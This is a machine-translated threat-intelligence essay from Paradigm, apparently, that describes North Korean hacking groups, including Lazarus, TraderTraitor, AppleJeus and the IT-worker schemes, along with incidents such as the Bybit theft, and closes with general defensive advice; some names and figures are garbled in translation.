Paradigm: Uncovering the Mystery of the Threat of the North Korean Hacker Group Lazarus Group

Original title: " Demystifying the North Korean Threat "

Author:samczsun , Research Partner, Paradigm

Compiled by: Bright, Foresight News

One February morning, the lights of the SEAL 911 group were on, and we watched in confusion as Bybit pulled over $1 billion of tokens from their cold wallet to a brand new address and quickly began liquidating over $200 million of LST. Within minutes we confirmed from the Bybit team and independent analytics (multi-signature, previously implemented with publicly validated Safe Wallet, now using newly deployed unverified contracts), which is not actually routine maintenance. Someone launched the biggest hacker attack in cryptocurrency history, and we were sitting in the front row of the historical drama.

While some of the team members (and the broader sleuth community) begin tracking funds and sending notifications to partner exchanges, the rest of the team are trying to figure out what exactly is going on and whether other funds are at risk. Fortunately, it is easy to identify the perpetrator. In the past few years, only one known threater has successfully stolen billions of dollars from cryptocurrency exchanges: North Korea, also known as DPRK.

However, beyond that, we have few clues available. Due to the cunning character of North Korean hackers and their superb means of self-hidden self-concealment, it is not only difficult to determine the root cause of the invasion, but it is also difficult to even know which specific team within North Korea is responsible for it. The only thing we can rely on is the existing intelligence that shows that North Korea does like to invade cryptocurrency exchanges through social engineering. Therefore, we guess that North Korea is likely to hack into Bybit's multisigner and then deploy some malware to interfere with the signature process.

As it turns out, this speculation is totally nonsense. A few days later we discovered that North Korea has actually destroyed the infrastructure of Safe Wallet itself and deployed a malicious overload specifically targeting Bybit. This level of complexity has never been considered or prepared by anyone, and it is a major challenge for many security models on the market.

North Korean hackers pose an increasingly serious threat to our industry and we cannot defeat an enemy we do not understand or understand. There are a lot of recorded incidents and articles about all aspects of North Korea’s cyber operations, but it’s hard to piece them together. I hope this overview will give people a more comprehensive understanding of how North Korea works and their strategies and procedures, making it easier for us to implement the right mitigation measures.

Organizational structure

Perhaps the biggest misunderstanding that needs to be resolved is how to classify and name a large number of network activities in North Korea. While it is acceptable to use the word "Lazarus Group" in spoken language to summarize, it can be helpful to use a more rigorous statement when discussing North Korea's systemic cyber threats in detail.

First, it will be helpful to understand North Korea's "organizational chart". The highest level of North Korea is the ruling party (and the only ruling party) of North Korea - the Workers' Party of Korea (WPK), and all government agencies in North Korea are led by it. These include the Korean People's Army (KPA) and the Central Committee. The People's Army has the General Staff Department (GSD), and the General Reconnaissance Bureau (RGB) is located here. The Central Committee is under the Ministry of Military Industry (MID).

RGB is responsible for almost all North Korean cyber warfare, including nearly all North Korean activities observed by the cryptocurrency industry. In addition to the infamous Lazarus Group, other threat actors appearing in RGB include AppleJeus, APT38, DangerousPassword, and TraderTraitor. On the other hand, MID is responsible for North Korea's nuclear missile program and is the main source of North Korean IT workers, which the intelligence community calls Contagious Interview and Wagemole.

Lazarus Group

Lazarus Group is a highly complex hacker group, and cybersecurity experts believe that some of the largest and most destructive hacking attacks in history are all done by the organization. In 2016, Novetta first discovered the Lazarus Group while analyzing the Sony TV Entertainment hack.

In 2014, Sony was working on the action comedy "Assassination of Kim Jong-un", whose main plot point was the humiliation and subsequent assassination. Understandably, this was not welcomed by the North Korean regime, which retaliated by invading Sony's network, stealing terabytes of data, leaking hundreds of GB of confidential or other sensitive information and deleting the original. As then-CEO Michael Linton said, “The people who do this not only stole everything in the house, they also burned the house.” Ultimately, Sony's investigation and remediation costs in the attack were at least $15 million, and the losses could be even more.

Then in 2016, a hacker that was very similar to the Lazarus Group broke into Bangladesh banks with the intention of stealing nearly $1 billion. Over the course of a year, hackers worked to carry out social engineering attacks on employees of Bangladesh Bank, eventually gaining remote access and moving within the bank's internal network until they reached the computer responsible for interacting with the SWIFT network. Since then, they have been waiting for a great opportunity to attack: Bangladesh Bank has closed for the weekend on Thursday, but the New York Federal Reserve has closed for the weekend on Friday. On Thursday night, local time in Bangladesh, threat actors used their access to the SWIFT network to send 36 separate transfer requests to the Federal Reserve Bank of New York on Thursday morning local time. In the next 24 hours, the Federal Reserve Bank of New York forwarded the transfers to the Rizal Commercial Bank of Rizal (RCBC) in the Philippines, which began to take action. Subsequently, when the Bangladesh Bank reopened, a hacker attack was discovered. They tried to inform the Rizal Commercial Bank to stop the ongoing transactions, but found that the Rizal Commercial Bank had been closed due to the Lunar New Year holiday.

Finally, in 2017, a massive WannaCry 2.0 ransomware attack destroyed industries around the world, partly blamed on the Lazarus Group. It is estimated that WannaCry caused billions of dollars in losses, taking advantage of Microsoft Windows 0day, which was originally developed by the NSA, not only encrypted local devices, but also spread to other accessible devices, eventually infecting hundreds of thousands of devices around the world. Fortunately, the end loss was limited to a certain range as safety researcher Marcus Hutchins discovered and activated the kill switch within eight hours.

Looking at the development history of Lazarus Group, they have demonstrated extremely high technical capabilities and execution, and one of their goals is to generate income for the North Korean regime. So it's only a matter of time before they turn their attention to the cryptocurrency industry.

derivative

Over time, as Lazarus Group became a general term that the media likes to use when describing North Korean cyber activities, the cybersecurity industry has created more precise names for Lazarus Group and North Korea’s specific activities. APT38 is an example, which was separated from the Lazarus Group around 2016 and focused on financial crime, first targeting banks (such as Bangladesh Bank) and then cryptocurrencies. Later in 2018, a new threat called AppleJeus was found to be spreading malware targeting cryptocurrency users. Finally, as early as 2018, when OFAC first announced sanctions on two front companies used by North Koreans, North Koreans who pretended to be IT workers had already penetrated the tech industry.

North Korean IT Workers

Although the earliest records indicate references to North Korean IT workers from the 2018 OFAC sanctions, Unit 42's 2023 report provides more detailed descriptions and identifies two different threat actors: Contagious Interview and Wagemole.

It is reported that Contagious Interview will impersonate recruiters from well-known companies and trick developers into participating in the fake interview process. The potential candidate is then instructed to clone a repository for local debugging, ostensibly as a coding challenge, but in fact the repository contains a backdoor that executes the backdoor to hand over control of the affected machine to the attacker. The event has been underway, with the most recent record on August 11, 2024.

On the other hand, the main goal of Wagemole Agents is not to hire potential victims, but to be hired by the company, where they just work like regular engineers, although they may not be efficient. That being said, there are records showing IT workers using their access to attacks, such as in the Munchables incident, an employee associated with a North Korean activity stole all assets using their privileged access to smart contracts.

The complexity of Wagemole agents varies, from the same resume templates and reluctance to participate in video calls to highly customized resumes, in-depth forged video interviews, and identification documents such as driver’s licenses and utility bills. In some cases, agents lurk in the victim organization for up to a year, then use their access to hack into other systems and/or cash out completely.

AppleJeus

AppleJeus focuses on spreading malware and is good at conducting complex supply chain attacks. In 2023, the 3CX supply chain attack made it possible for attackers to infect more than 1212 million users of 3CX VoIP software, but it was later discovered that 3CX itself was also attacked by supply chain attacks that affected one of its upstream suppliers, Trading Technologies 13.

In the cryptocurrency industry, AppleJeus initially distributes malware packaged into legal software, such as trading software or cryptocurrency wallets. However, their strategies have changed over time. In October 2024, Radiant Capital was captured by a threat actor who pretended to be a trusted contractor through malware sent by Telegram, which Mandiant blamed on AppleJeus.

Dangerous Password

Dangerous Password is responsible for low-complexity social engineering-based attacks on the cryptocurrency industry. Back in 2019, JPCERT/CC recorded that Dangerous Password would send phishing emails with attractive attachments for users to download. In the past few years, Dangerous Password was responsible for sending phishing emails impersonating an industry-renowned person, with the theme of "Stablecoins and crypto assets are extremely risky."

Today, Dangerous Password is still sending phishing emails, but has also expanded to other platforms. For example, Radiant Capital reported that they received a phishing message via Telegram, which came from someone who pretended to be a security researcher who distributed a file called "Penpie_Hacking_Analysis_Report.zip". Additionally, users reported that someone contacted them as a reporter and an investor, asking to use an inconspicuous video conferencing app to schedule calls. Like Zoom, these apps download a one-time installer, but run the malware installed on the device.

TraderTraitor

TraderTraitor is the most experienced North Korean hacker in the cryptocurrency industry and has launched hacking attacks on Axie Infinity and Rain.com, among others. TraderTraitor targets almost exclusively exchanges and other companies with large reserves, and does not deploy zero-day vulnerabilities to their targets, but instead uses highly sophisticated spear phishing techniques to attack victims. In the Axie Infinity hacking case, TraderTraitor contacted a senior engineer through LinkedIn and successfully convinced them to undergo a series of interviews, then sent a "proposal" to deliver the malware. Then, in the WazirX hack, TraderTraitor agents destroyed an undefined component in the signature pipeline, and then drained the exchange's hot wallet by repeatedly depositing and withdrawing money, causing WazirX engineers to rebalance from cold wallet to hot wallet. When WazirX engineers tried to sign a deal to transfer funds, they were tricked into signing a deal that handed over control of the cold wallet to TraderTraitor. This is very similar to the February 2025 attack on Bybit, when TraderTraitor first destroyed the Safe{Wallet} infrastructure through social engineering attacks, and then deployed malicious JavaScript to the Safe Wallet frontend specifically targeting Bybit cold wallets. When Bybit goes to rebalance their wallets, the malicious code is activated, which in turn causes Bybit engineers to sign a transaction to hand over control of the cold wallet to TraderTraitor.

Stay safe

North Korea has demonstrated its ability to deal with its opponents’ zero-day vulnerabilities, but there is currently no record or known incident of North Korea’s deployment of zero-day vulnerabilities to the cryptocurrency industry. Therefore, typical security advice applies to almost all threats from North Korean hackers.

For individuals, we must use common sense and be vigilant about social engineering methods. For example, if someone claims to have some highly confidential information and is willing to share it with you, please exercise caution. Or, if someone puts time pressure on you to download and run certain software, consider whether they are trying to put you in a situation where you can’t think logically.

For an organization, the principle of least privilege is applied as much as possible. Minimize the number of people who have access to sensitive systems and make sure they use password managers and 2FA. Keep personal devices separate from work devices and install mobile device management (MDM) and endpoint detection and response (EDR) software on the work device to ensure pre-hacking security and post-hacking visibility.

Unfortunately, TraderTraitor can break even if it doesn't require zero-day vulnerabilities. Therefore, additional precautions must be taken to ensure that there is no single point of failure, so as not to lose all funds in one intrusion.

However, even if everything fails, there is still hope. The FBI has a unit dedicated to tracking and preventing North Korean invasions, which has been making victim notifications for years, and I’m very excited to help the agents of the department establish contacts with potential North Korean targets recently. So, to be prepared for the worst, make sure you have public contact information or that you have enough people in the ecosystem (such as SEAL 911) so that messages traveling through the social graph can reach you as quickly as possible.